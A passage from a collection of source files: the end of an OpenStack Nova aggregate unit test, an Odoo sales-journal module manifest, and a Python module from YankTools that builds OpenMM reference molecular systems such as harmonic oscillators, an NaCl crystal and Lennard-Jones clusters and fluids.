@mock.patch('nova.db.aggregate_get_by_metadata_key')
def test_get_by_metadata_key_and_hosts_no_match(self, get_by_metadata_key):
get_by_metadata_key.return_value = [fake_aggregate]
aggs = aggregate.AggregateList.get_by_metadata_key(
self.context, 'this', hosts=['baz'])
self.assertEqual(0, len(aggs))
@mock.patch('nova.db.aggregate_get_by_metadata_key')
def test_get_by_metadata_key_and_hosts_match(self, get_by_metadata_key):
get_by_metadata_key.return_value = [fake_aggregate]
aggs = aggregate.AggregateList.get_by_metadata_key(
self.context, 'this', hosts=['foo', 'bar'])
self.assertEqual(1, len(aggs))
self.compare_obj(aggs[0], fake_aggregate, subs=SUBS)
class TestAggregateObject(test_objects._LocalTest,
_TestAggregateObject):
pass
class TestRemoteAggregateObject(test_objects._RemoteTest,
_TestAggregateObject):
pass
|
apache-2.0
|
fgesora/odoo
|
addons/sale_journal/__openerp__.py
|
262
|
2637
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Invoicing Journals',
'version': '1.0',
'category': 'Sales Management',
'description': """
The sales journal module allows you to categorise your sales and deliveries (picking lists) into different journals.
========================================================================================================================
This module is very helpful for bigger companies that work by departments.
You can use journals for different purposes, for example:
----------------------------------------------------------
* isolate sales of different departments
* journals for deliveries by truck or by UPS
Journals have a responsible person and evolve through different statuses:
-----------------------------------------------------------------
* draft, open, cancel, done.
Batch operations can be processed on the different journals to confirm all sales
at once, or to validate and invoice pickings.
It also supports batch invoicing methods that can be configured per partner and sales order, for example:
-------------------------------------------------------------------------------------------------------
* daily invoicing
* monthly invoicing
Some statistics by journals are provided.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/billing',
'depends': ['sale_stock'],
'data': [
'security/ir.model.access.csv',
'sale_journal_view.xml',
'sale_journal_data.xml'
],
'demo': ['sale_journal_demo.xml'],
'test': [ ],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
choderalab/YankTools
|
testsystems/systems.py
|
1
|
74487
|
#!/usr/local/bin/env python
"""
Module to generate Systems and positions for simple reference molecular systems for testing.
DESCRIPTION
This module provides functions for building a number of test systems of varying complexity,
useful for testing both OpenMM and various codes based on pyopenmm.
Note that the PYOPENMM_SOURCE_DIR must be set to point to where the PyOpenMM package is unpacked.
EXAMPLES
Create a 3D harmonic oscillator.
>>> import test_systems
>>> ho = test_systems.HarmonicOscillator()
>>> system, positions = ho.system, ho.positions
See list of methods for a complete list of provided test systems.
COPYRIGHT
@author Randall J. Radmer <[email protected]>
@author John D. Chodera <[email protected]>
All code in this repository is released under the GNU General Public License.
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
TODO
* Add units checking code to check arguments.
* Change default arguments to Quantity objects, rather than None?
"""
import os
import os.path
import sys
import numpy as np
import numpy.random
import math
import copy
import simtk
import simtk.openmm as mm
import simtk.unit as units
import simtk.openmm.app as app
kB = units.BOLTZMANN_CONSTANT_kB * units.AVOGADRO_CONSTANT_NA
#=============================================================================================
# Thermodynamic state description
#=============================================================================================
class ThermodynamicState(object):
"""
Data specifying a thermodynamic state obeying Boltzmann statistics.
EXAMPLES
Specify an NVT state for a water box at 298 K.
>>> import simtk.unit as u
>>> state = ThermodynamicState(temperature=298.0*u.kelvin)
Specify an NPT state at 298 K and 1 atm pressure.
>>> state = ThermodynamicState(temperature=298.0*u.kelvin, pressure=1.0*u.atmospheres)
Note that the pressure is only relevant for periodic systems.
"""
def __init__(self, temperature=None, pressure=None):
"""
Initialize the thermodynamic state.
OPTIONAL ARGUMENTS
        temperature (simtk.unit.Quantity compatible with 'kelvin') - the temperature for a system with constant temperature (default: None)
        pressure (simtk.unit.Quantity compatible with 'atmospheres') - the pressure for constant-pressure systems (default: None)
"""
# Initialize.
self.temperature = temperature
self.pressure = pressure
return
#=============================================================================================
# Abstract base class for test systems
#=============================================================================================
class TestSystem(object):
"""Abstract base class for test systems, demonstrating how to implement a test system.
Parameters
----------
Attributes
----------
system : simtk.openmm.System
Openmm system with the harmonic oscillator
positions : list
positions of harmonic oscillator
Notes
-----
Unimplemented methods will default to the base class methods, which raise a NotImplementedException.
Examples
--------
Create a test system.
>>> testsystem = TestSystem()
Retrieve System object.
>>> system = testsystem.system
Retrieve the positions.
>>> positions = testsystem.positions
Serialize system and positions to XML (to aid in debugging).
>>> (system_xml, positions_xml) = testsystem.serialize()
"""
def __init__(self, temperature=None, pressure=None):
"""Abstract base class for test system.
Parameters
----------
temperature : simtk.unit.Quantity, optional, units compatible with simtk.unit.kelvin
The temperature of the system.
pressure : simtk.unit.Quantity, optional, units compatible with simtk.unit.atmospheres
The pressure of the system.
"""
# Create an empty system object.
self._system = mm.System()
# Store positions.
self._positions = units.Quantity(np.zeros([0,3], np.float), units.nanometers)
# Store thermodynamic parameters.
self._temperature = temperature
self._pressure = pressure
return
@property
def system(self):
"""The simtk.openmm.System object corresponding to the test system."""
return copy.deepcopy(self._system)
@system.setter
def system(self, value):
self._system = value
@system.deleter
def system(self):
del self._system
@property
def positions(self):
"""The simtk.unit.Quantity object containing the particle positions, with units compatible with simtk.unit.nanometers."""
return copy.deepcopy(self._positions)
@positions.setter
def positions(self, value):
self._positions = value
@positions.deleter
def positions(self):
del self._positions
@property
def analytical_properties(self):
"""A list of available analytical properties, accessible via 'get_propertyname(thermodynamic_state)' calls."""
return [ method[4:] for method in dir(self) if (method[0:4]=='get_') ]
def serialize(self):
"""Return the System and positions in serialized XML form.
Returns
-------
system_xml : str
Serialized XML form of System object.
state_xml : str
Serialized XML form of State object containing particle positions.
"""
from simtk.openmm import XmlSerializer
# Serialize System.
system_xml = XmlSerializer.serialize(self._system)
# Serialize positions via State.
if self._system.getNumParticles() == 0:
# Cannot serialize the State of a system with no particles.
state_xml = None
else:
platform = mm.Platform.getPlatformByName('Reference')
integrator = mm.VerletIntegrator(1.0 * units.femtoseconds)
context = mm.Context(self._system, integrator, platform)
context.setPositions(self._positions)
state = context.getState(getPositions=True)
del context, integrator
state_xml = XmlSerializer.serialize(state)
return (system_xml, state_xml)
@property
def name(self):
"""The name of the test system."""
return self.__class__.__name__
#=============================================================================================
# 3D harmonic oscillator
#=============================================================================================
class HarmonicOscillator(TestSystem):
"""Create a 3D harmonic oscillator, with a single particle confined in an isotropic harmonic well.
Parameters
----------
K : simtk.unit.Quantity, optional, default=100.0 * units.kilocalories_per_mole/units.angstrom**2
harmonic restraining potential
mass : simtk.unit.Quantity, optional, default=39.948 * units.amu
particle mass
Attributes
----------
system : simtk.openmm.System
Openmm system with the harmonic oscillator
positions : list
positions of harmonic oscillator
Notes
-----
    The natural period of a harmonic oscillator is T = 2*pi*sqrt(m/K), so you will want to use an
    integration timestep smaller than ~ T/10.
The standard deviation in position in each dimension is sigma = (kT / K)^(1/2)
    The expectation of the potential energy of a 3D harmonic oscillator is (3/2)kT, and its standard deviation is sqrt(3/2) kT.
Examples
--------
Create a 3D harmonic oscillator with default parameters:
>>> ho = HarmonicOscillator()
>>> (system, positions) = ho.system, ho.positions
Create a harmonic oscillator with specified mass and spring constant:
>>> mass = 12.0 * units.amu
>>> K = 1.0 * units.kilocalories_per_mole / units.angstroms**2
>>> ho = HarmonicOscillator(K=K, mass=mass)
>>> (system, positions) = ho.system, ho.positions
Get a list of the available analytically-computed properties.
>>> print ho.analytical_properties
['potential_expectation', 'potential_standard_deviation']
Compute the potential expectation and standard deviation
>>> import simtk.unit as u
>>> thermodynamic_state = ThermodynamicState(temperature=298.0*u.kelvin)
>>> potential_mean = ho.get_potential_expectation(thermodynamic_state)
>>> potential_stddev = ho.get_potential_standard_deviation(thermodynamic_state)
"""
def __init__(self, K=100.0 * units.kilocalories_per_mole / units.angstroms**2, mass=39.948 * units.amu, **kwargs):
        TestSystem.__init__(self, **kwargs)
# Create an empty system object.
system = mm.System()
# Add the particle to the system.
system.addParticle(mass)
# Set the positions.
positions = units.Quantity(np.zeros([1,3], np.float32), units.angstroms)
        # Add a restraining potential centered at the origin.
force = mm.CustomExternalForce('(K/2.0) * (x^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
force.addParticle(0, [])
system.addForce(force)
self.K, self.mass = K, mass
self.system, self.positions = system, positions
# Number of degrees of freedom.
self.ndof = 3
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (3./2.) * kB * state.temperature
def get_potential_standard_deviation(self, state):
"""Return the standard deviation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
        return math.sqrt(3./2.) * kB * state.temperature  # stddev of 3 quadratic degrees of freedom
#=============================================================================================
# Diatomic molecule
#=============================================================================================
class Diatom(TestSystem):
"""Create a free diatomic molecule with a single harmonic bond between the two atoms.
Parameters
----------
K : simtk.unit.Quantity, optional, default=290.1 * units.kilocalories_per_mole / units.angstrom**2
harmonic bond potential. default is GAFF c-c bond
    r0 : simtk.unit.Quantity, optional, default=1.550 * units.angstroms
        bond length. Default is Amber GAFF c-c bond.
constraint : bool, default=False
if True, the bond length will be constrained
    m1 : simtk.unit.Quantity, optional, default=39.948 * units.amu
        particle1 mass
    m2 : simtk.unit.Quantity, optional, default=39.948 * units.amu
        particle2 mass
use_central_potential : bool, optional, default=False
if True, a soft central potential will also be added to keep the system from drifting away
Notes
-----
    The natural period of a harmonic oscillator is T = 2*pi*sqrt(m/K), so you will want to use an
    integration timestep smaller than ~ T/10.
Examples
--------
Create a Diatom:
>>> diatom = Diatom()
>>> system, positions = diatom.system, diatom.positions
"""
def __init__(self,
K=290.1 * units.kilocalories_per_mole / units.angstrom**2,
r0=1.550 * units.angstroms,
m1=39.948 * units.amu,
m2=39.948 * units.amu,
constraint=False,
use_central_potential=False):
# Create an empty system object.
system = mm.System()
# Add two particles to the system.
system.addParticle(m1)
system.addParticle(m2)
# Add a harmonic bond.
force = mm.HarmonicBondForce()
force.addBond(0, 1, r0, K)
system.addForce(force)
if constraint:
# Add constraint between particles.
system.addConstraint(0, 1, r0)
# Set the positions.
positions = units.Quantity(np.zeros([2,3], np.float32), units.angstroms)
positions[1,0] = r0
if use_central_potential:
# Add a central restraining potential.
Kcentral = 1.0 * units.kilocalories_per_mole / units.nanometer**2
force = mm.CustomExternalForce('(Kcentral/2.0) * (x^2 + y^2 + z^2)')
            force.addGlobalParameter('Kcentral', Kcentral)
force.addParticle(0, [])
force.addParticle(1, [])
system.addForce(force)
self.system, self.positions = system, positions
self.K, self.r0, self.m1, self.m2, self.constraint, self.use_central_potential = K, r0, m1, m2, constraint, use_central_potential
# Store number of degrees of freedom.
self.ndof = 6 - 1*constraint
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (self.ndof/2.) * kB * state.temperature
#=============================================================================================
# Constraint-coupled harmonic oscillator
#=============================================================================================
class ConstraintCoupledHarmonicOscillator(TestSystem):
"""Create a pair of particles in 3D harmonic oscillator wells, coupled by a constraint.
Parameters
----------
K : simtk.unit.Quantity, optional, default=1.0 * units.kilojoules_per_mole / units.nanometer**2
harmonic restraining potential
d : simtk.unit.Quantity, optional, default=1.0 * units.nanometer
        distance between harmonic oscillators
mass : simtk.unit.Quantity, default=39.948 * units.amu
particle mass
Attributes
----------
system : simtk.openmm.System
positions : list
Notes
-----
    The natural period of a harmonic oscillator is T = 2*pi*sqrt(m/K), so you will want to use an
    integration timestep smaller than ~ T/10.
Examples
--------
Create a constraint-coupled harmonic oscillator with specified mass, distance, and spring constant.
>>> ccho = ConstraintCoupledHarmonicOscillator()
>>> mass = 12.0 * units.amu
>>> d = 5.0 * units.angstroms
>>> K = 1.0 * units.kilocalories_per_mole / units.angstroms**2
>>> ccho = ConstraintCoupledHarmonicOscillator(K=K, d=d, mass=mass)
>>> system, positions = ccho.system, ccho.positions
"""
def __init__(self,
K=1.0 * units.kilojoules_per_mole/units.nanometer**2,
d=1.0 * units.nanometer,
mass=39.948 * units.amu):
# Create an empty system object.
system = mm.System()
# Add particles to the system.
system.addParticle(mass)
system.addParticle(mass)
# Set the positions.
positions = units.Quantity(np.zeros([2,3], np.float32), units.angstroms)
positions[1,0] = d
        # Add a restraining potential centered at the origin.
force = mm.CustomExternalForce('(K/2.0) * ((x-d)^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
force.addPerParticleParameter('d')
force.addParticle(0, [0.0])
force.addParticle(1, [d / units.nanometers])
system.addForce(force)
# Add constraint between particles.
system.addConstraint(0, 1, d)
# Add a harmonic bond force as well so minimization will roughly satisfy constraints.
force = mm.HarmonicBondForce()
        K_bond = 10.0 * units.kilocalories_per_mole / units.angstrom**2 # bond force constant
        force.addBond(0, 1, d, K_bond)
system.addForce(force)
self.system, self.positions = system, positions
self.K, self.d, self.mass = K, d, mass
#=============================================================================================
# Harmonic oscillator array
#=============================================================================================
class HarmonicOscillatorArray(TestSystem):
"""Create a 1D array of noninteracting particles in 3D harmonic oscillator wells.
Parameters
----------
K : simtk.unit.Quantity, optional, default=90.0 * units.kilocalories_per_mole/units.angstroms**2
harmonic restraining potential
d : simtk.unit.Quantity, optional, default=1.0 * units.nanometer
        distance between harmonic oscillators
mass : simtk.unit.Quantity, default=39.948 * units.amu
particle mass
N : int, optional, default=5
Number of harmonic oscillators
Attributes
----------
system : simtk.openmm.System
positions : list
Notes
-----
    The natural period of a harmonic oscillator is T = 2*pi*sqrt(m/K), so you will want to use an
    integration timestep smaller than ~ T/10.
Examples
--------
    Create a 3D harmonic oscillator array with default parameters.
>>> ho_array = HarmonicOscillatorArray()
>>> mass = 12.0 * units.amu
>>> d = 5.0 * units.angstroms
>>> K = 1.0 * units.kilocalories_per_mole / units.angstroms**2
>>> ccho = HarmonicOscillatorArray(K=K, d=d, mass=mass)
>>> system, positions = ccho.system, ccho.positions
"""
def __init__(self, K=90.0 * units.kilocalories_per_mole/units.angstroms**2,
d=1.0 * units.nanometer,
mass=39.948 * units.amu ,
N=5):
# Create an empty system object.
system = mm.System()
# Add particles to the system.
for n in range(N):
system.addParticle(mass)
# Set the positions for a 1D array of particles spaced d apart along the x-axis.
positions = units.Quantity(np.zeros([N,3], np.float32), units.angstroms)
for n in range(N):
positions[n,0] = n*d
        # Add a restraining potential for each oscillator.
force = mm.CustomExternalForce('(K/2.0) * ((x-x0)^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
force.addPerParticleParameter('x0')
for n in range(N):
parameters = (d*n / units.nanometers, )
force.addParticle(n, parameters)
system.addForce(force)
self.system, self.positions = system, positions
self.K, self.d, self.mass, self.N = K, d, mass, N
self.ndof = 3*N
def get_potential_expectation(self, state):
"""Return the expectation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_mean : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
The expectation of the potential energy.
"""
return (self.ndof/2.) * kB * state.temperature
def get_potential_standard_deviation(self, state):
"""Return the standard deviation of the potential energy, computed analytically or numerically.
Arguments
---------
state : ThermodynamicState with temperature defined
The thermodynamic state at which the property is to be computed.
Returns
-------
potential_stddev : simtk.unit.Quantity compatible with simtk.unit.kilojoules_per_mole
potential energy standard deviation if implemented, or else None
"""
        return math.sqrt(self.ndof/2.) * kB * state.temperature  # stddev of ndof quadratic degrees of freedom
#=============================================================================================
# Sodium chloride FCC crystal.
#=============================================================================================
class SodiumChlorideCrystal(TestSystem):
"""Create an FCC crystal of sodium chloride.
Each atom is represented by a charged Lennard-Jones sphere in an Ewald lattice.
Notes
-----
TODO
* Lennard-Jones interactions aren't correctly being included now, due to LJ cutoff. Fix this by hard-coding LJ interactions?
* Add nx, ny, nz arguments to allow user to specify replication of crystal unit in x,y,z.
* Choose more appropriate lattice parameters and lattice spacing.
Examples
--------
Create sodium chloride crystal unit.
>>> crystal = SodiumChlorideCrystal()
>>> system, positions = crystal.system, crystal.positions
"""
def __init__(self):
# Set default parameters (from Tinker).
mass_Na = 22.990 * units.amu
mass_Cl = 35.453 * units.amu
q_Na = 1.0 * units.elementary_charge
q_Cl =-1.0 * units.elementary_charge
sigma_Na = 3.330445 * units.angstrom
sigma_Cl = 4.41724 * units.angstrom
epsilon_Na = 0.002772 * units.kilocalorie_per_mole
epsilon_Cl = 0.118 * units.kilocalorie_per_mole
# Create system
system = mm.System()
# Set box vectors.
box_size = 5.628 * units.angstroms # box width
a = units.Quantity(np.zeros([3]), units.nanometers); a[0] = box_size
b = units.Quantity(np.zeros([3]), units.nanometers); b[1] = box_size
c = units.Quantity(np.zeros([3]), units.nanometers); c[2] = box_size
system.setDefaultPeriodicBoxVectors(a, b, c)
# Create nonbonded force term.
force = mm.NonbondedForce()
# Set interactions to be periodic Ewald.
force.setNonbondedMethod(mm.NonbondedForce.Ewald)
# Set cutoff to be less than one half the box length.
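        # (OpenMM requires the cutoff to satisfy the minimum-image convention,
        # i.e. to be under half the smallest box dimension)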
cutoff = box_size / 2.0 * 0.99
force.setCutoffDistance(cutoff)
# Allocate storage for positions.
natoms = 2
positions = units.Quantity(np.zeros([natoms,3], np.float32), units.angstroms)
# Add sodium ion.
system.addParticle(mass_Na)
force.addParticle(q_Na, sigma_Na, epsilon_Na)
positions[0,0] = 0.0 * units.angstrom
positions[0,1] = 0.0 * units.angstrom
positions[0,2] = 0.0 * units.angstrom
# Add chloride atom.
system.addParticle(mass_Cl)
force.addParticle(q_Cl, sigma_Cl, epsilon_Cl)
positions[1,0] = 2.814 * units.angstrom
positions[1,1] = 2.814 * units.angstrom
positions[1,2] = 2.814 * units.angstrom
# Add nonbonded force term to the system.
system.addForce(force)
self.system, self.positions = system, positions
#=============================================================================================
# Lennard-Jones cluster
#=============================================================================================
class LennardJonesCluster(TestSystem):
"""Create a non-periodic rectilinear grid of Lennard-Jones particles in a harmonic restraining potential.
Parameters
----------
nx : int, optional, default=3
number of particles in the x direction
ny : int, optional, default=3
number of particles in the y direction
nz : int, optional, default=3
number of particles in the z direction
K : simtk.unit.Quantity, optional, default=1.0 * units.kilojoules_per_mole/units.nanometer**2
harmonic restraining potential
Examples
--------
Create Lennard-Jones cluster.
>>> cluster = LennardJonesCluster()
>>> system, positions = cluster.system, cluster.positions
    Create a larger 10x10x10 Lennard-Jones cluster in a harmonic restraining potential.
>>> cluster = LennardJonesCluster(nx=10, ny=10, nz=10)
>>> system, positions = cluster.system, cluster.positions
"""
def __init__(self, nx=3, ny=3, nz=3, K=1.0 * units.kilojoules_per_mole/units.nanometer**2):
# Default parameters
mass_Ar = 39.9 * units.amu
q_Ar = 0.0 * units.elementary_charge
sigma_Ar = 3.350 * units.angstrom
epsilon_Ar = 0.001603 * units.kilojoule_per_mole
scaleStepSizeX = 1.0
scaleStepSizeY = 1.0
scaleStepSizeZ = 1.0
# Determine total number of atoms.
natoms = nx * ny * nz
# Create an empty system object.
system = mm.System()
# Create a NonbondedForce object with no cutoff.
nb = mm.NonbondedForce()
nb.setNonbondedMethod(mm.NonbondedForce.NoCutoff)
positions = units.Quantity(np.zeros([natoms,3],np.float32), units.angstrom)
atom_index = 0
for ii in range(nx):
for jj in range(ny):
for kk in range(nz):
system.addParticle(mass_Ar)
nb.addParticle(q_Ar, sigma_Ar, epsilon_Ar)
x = sigma_Ar*scaleStepSizeX*(ii - nx/2.0)
y = sigma_Ar*scaleStepSizeY*(jj - ny/2.0)
z = sigma_Ar*scaleStepSizeZ*(kk - nz/2.0)
positions[atom_index,0] = x
positions[atom_index,1] = y
positions[atom_index,2] = z
atom_index += 1
# Add the nonbonded force.
system.addForce(nb)
        # Add a restraining potential centered at the origin.
force = mm.CustomExternalForce('(K/2.0) * (x^2 + y^2 + z^2)')
force.addGlobalParameter('K', K)
for particle_index in range(natoms):
force.addParticle(particle_index, [])
system.addForce(force)
self.system, self.positions = system, positions
#=============================================================================================
# Lennard-Jones fluid
#=============================================================================================
class LennardJonesFluid(TestSystem):
"""Create a periodic rectilinear grid of Lennard-Jones particles.
    Parameters for argon are used by default. Cutoff is set to 2.5 sigma by default.
Parameters
----------
nx : int, optional, default=6
number of particles in the x direction
ny : int, optional, default=6
number of particles in the y direction
nz : int, optional, default=6
number of particles in the z direction
mass : simtk.unit.Quantity, optional, default=39.9 * units.amu
mass of each particle.
sigma : simtk.unit.Quantity, optional, default=3.4 * units.angstrom
Lennard-Jones sigma parameter
epsilon : simtk.unit.Quantity, optional, default=0.238 * units.kilocalories_per_mole
Lennard-Jones well depth
cutoff : simtk.unit.Quantity, optional, default=None
Cutoff for nonbonded interactions. If None, defaults to 2.5 * sigma
    switch : simtk.unit.Quantity, optional, default=False
        if specified as a distance, the switching function will be turned on at this distance
dispersion_correction : bool, optional, default=True
if True, will use analytical dispersion correction (if not using switching function)
Examples
--------
Create default-size Lennard-Jones fluid.
>>> fluid = LennardJonesFluid()
>>> system, positions = fluid.system, fluid.positions
Create a larger 10x8x5 box of Lennard-Jones particles.
>>> fluid = LennardJonesFluid(nx=10, ny=8, nz=5)
>>> system, positions = fluid.system, fluid.positions
    Create Lennard-Jones fluid using switched particle interactions (switched off between 7 and 9 A) and more particles.
>>> fluid = LennardJonesFluid(nx=10, ny=10, nz=10, switch=7.0*units.angstroms, cutoff=9.0*units.angstroms)
>>> system, positions = fluid.system, fluid.positions
"""
def __init__(self, nx=6, ny=6, nz=6,
mass=39.9 * units.amu, # argon
sigma=3.4 * units.angstrom, # argon,
epsilon=0.238 * units.kilocalories_per_mole, # argon,
cutoff=None,
switch=False,
dispersion_correction=True):
if cutoff is None:
cutoff = 2.5 * sigma
charge = 0.0 * units.elementary_charge
scaleStepSizeX = 1.0
scaleStepSizeY = 1.0
scaleStepSizeZ = 1.0
# Determine total number of atoms.
natoms = nx * ny * nz
# Create an empty system object.
system = mm.System()
# Set up periodic nonbonded interactions with a cutoff.
if switch:
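            # S below is the CHARMM-style quartic switching function: it equals 1
            # at r = switch and 0 at r = cutoff, with zero slope at both ends, so
            # the potential is smoothly truncated.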
energy_expression = "LJ * S;"
energy_expression += "LJ = 4*epsilon*((sigma/r)^12 - (sigma/r)^6);"
#energy_expression += "sigma = 0.5 * (sigma1 + sigma2);"
#energy_expression += "epsilon = sqrt(epsilon1*epsilon2);"
energy_expression += "S = (cutoff^2 - r^2)^2 * (cutoff^2 + 2*r^2 - 3*switch^2) / (cutoff^2 - switch^2)^3;"
nb = mm.CustomNonbondedForce(energy_expression)
nb.addGlobalParameter('switch', switch)
nb.addGlobalParameter('cutoff', cutoff)
nb.addGlobalParameter('sigma', sigma)
nb.addGlobalParameter('epsilon', epsilon)
nb.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
else:
nb = mm.NonbondedForce()
nb.setNonbondedMethod(mm.NonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
nb.setUseDispersionCorrection(dispersion_correction)
positions = units.Quantity(np.zeros([natoms,3],np.float32), units.angstrom)
maxX = 0.0 * units.angstrom
maxY = 0.0 * units.angstrom
maxZ = 0.0 * units.angstrom
atom_index = 0
for ii in range(nx):
for jj in range(ny):
for kk in range(nz):
system.addParticle(mass)
if switch:
nb.addParticle([])
else:
nb.addParticle(charge, sigma, epsilon)
x = sigma*scaleStepSizeX*ii
y = sigma*scaleStepSizeY*jj
z = sigma*scaleStepSizeZ*kk
positions[atom_index,0] = x
positions[atom_index,1] = y
positions[atom_index,2] = z
atom_index += 1
                    # Track the maximum particle extent in each dimension.
if x>maxX: maxX = x
if y>maxY: maxY = y
if z>maxZ: maxZ = z
# Set periodic box vectors.
x = maxX+2*sigma*scaleStepSizeX
y = maxY+2*sigma*scaleStepSizeY
z = maxZ+2*sigma*scaleStepSizeZ
a = units.Quantity((x, 0*units.angstrom, 0*units.angstrom))
b = units.Quantity((0*units.angstrom, y, 0*units.angstrom))
c = units.Quantity((0*units.angstrom, 0*units.angstrom, z))
system.setDefaultPeriodicBoxVectors(a, b, c)
# Add the nonbonded force.
system.addForce(nb)
self.system, self.positions = system, positions
#=============================================================================================
# Custom Lennard-Jones fluid
#=============================================================================================
class CustomLennardJonesFluid(TestSystem):
"""Create a periodic rectilinear grid of Lennard-Jones particled, but implemented via CustomBondForce rather than NonbondedForce.
Parameters for argon are used by default. Cutoff is set to 3 sigma by default.
Parameters
----------
nx : int, optional, default=6
number of particles in the x direction
ny : int, optional, default=6
number of particles in the y direction
nz : int, optional, default=6
number of particles in the z direction
mass : simtk.unit.Quantity, optional, default=39.9 * units.amu
mass of each particle.
sigma : simtk.unit.Quantity, optional, default=3.4 * units.angstrom
Lennard-Jones sigma parameter
epsilon : simtk.unit.Quantity, optional, default=0.238 * units.kilocalories_per_mole
Lennard-Jones well depth
cutoff : simtk.unit.Quantity, optional, default=None
Cutoff for nonbonded interactions. If None, defaults to 2.5 * sigma
    switch : simtk.unit.Quantity, optional, default=False
        if specified as a distance, the switching function will be turned on at this distance
dispersion_correction : bool, optional, default=True
if True, will use analytical dispersion correction (if not using switching function)
Notes
-----
    An approximate long-range dispersion correction is added as a constant external potential in the non-switched case; no correction is applied when the switching function is used.
Examples
--------
Create default-size Lennard-Jones fluid.
>>> fluid = CustomLennardJonesFluid()
>>> system, positions = fluid.system, fluid.positions
Create a larger 10x8x5 box of Lennard-Jones particles.
>>> fluid = CustomLennardJonesFluid(nx=10, ny=8, nz=5)
>>> system, positions = fluid.system, fluid.positions
    Create Lennard-Jones fluid using switched particle interactions (switched off between 7 and 9 A) and more particles.
>>> fluid = CustomLennardJonesFluid(nx=10, ny=10, nz=10, switch=7.0*units.angstroms, cutoff=9.0*units.angstroms)
>>> system, positions = fluid.system, fluid.positions
"""
def __init__(self, nx=6, ny=6, nz=6,
mass=39.9 * units.amu, # argon
sigma=3.4 * units.angstrom, # argon,
epsilon=0.238 * units.kilocalories_per_mole, # argon,
cutoff=None,
switch=False,
dispersion_correction=True):
if cutoff is None:
cutoff = 2.5 * sigma
charge = 0.0 * units.elementary_charge
scaleStepSizeX = 1.0
scaleStepSizeY = 1.0
scaleStepSizeZ = 1.0
# Determine total number of atoms.
natoms = nx * ny * nz
# Create an empty system object.
system = mm.System()
# Set up periodic nonbonded interactions with a cutoff.
if switch:
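            # Same CHARMM-style switching function as in LennardJonesFluid above:
            # S goes smoothly from 1 at r = switch to 0 at r = cutoff.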
energy_expression = "LJ * S;"
energy_expression += "LJ = 4*epsilon*((sigma/r)^12 - (sigma/r)^6);"
energy_expression += "S = (cutoff^2 - r^2)^2 * (cutoff^2 + 2*r^2 - 3*switch^2) / (cutoff^2 - switch^2)^3;"
nb = mm.CustomNonbondedForce(energy_expression)
nb.addGlobalParameter('switch', switch)
nb.addGlobalParameter('cutoff', cutoff)
nb.addGlobalParameter('sigma', sigma)
nb.addGlobalParameter('epsilon', epsilon)
nb.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
else:
energy_expression = "4*epsilon*((sigma/r)^12 - (sigma/r)^6);"
nb = mm.CustomNonbondedForce(energy_expression)
nb.addGlobalParameter('sigma', sigma)
nb.addGlobalParameter('epsilon', epsilon)
nb.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
nb.setCutoffDistance(cutoff)
positions = units.Quantity(np.zeros([natoms,3],np.float32), units.angstrom)
maxX = 0.0 * units.angstrom
maxY = 0.0 * units.angstrom
maxZ = 0.0 * units.angstrom
atom_index = 0
for ii in range(nx):
for jj in range(ny):
for kk in range(nz):
system.addParticle(mass)
nb.addParticle([])
x = sigma*scaleStepSizeX*ii
y = sigma*scaleStepSizeY*jj
z = sigma*scaleStepSizeZ*kk
positions[atom_index,0] = x
positions[atom_index,1] = y
positions[atom_index,2] = z
atom_index += 1
                    # Track the maximum particle extent in each dimension.
if x>maxX: maxX = x
if y>maxY: maxY = y
if z>maxZ: maxZ = z
# Set periodic box vectors.
x = maxX+2*sigma*scaleStepSizeX
y = maxY+2*sigma*scaleStepSizeY
z = maxZ+2*sigma*scaleStepSizeZ
a = units.Quantity((x, 0*units.angstrom, 0*units.angstrom))
b = units.Quantity((0*units.angstrom, y, 0*units.angstrom))
c = units.Quantity((0*units.angstrom, 0*units.angstrom, z))
system.setDefaultPeriodicBoxVectors(a, b, c)
# Add the nonbonded force.
system.addForce(nb)
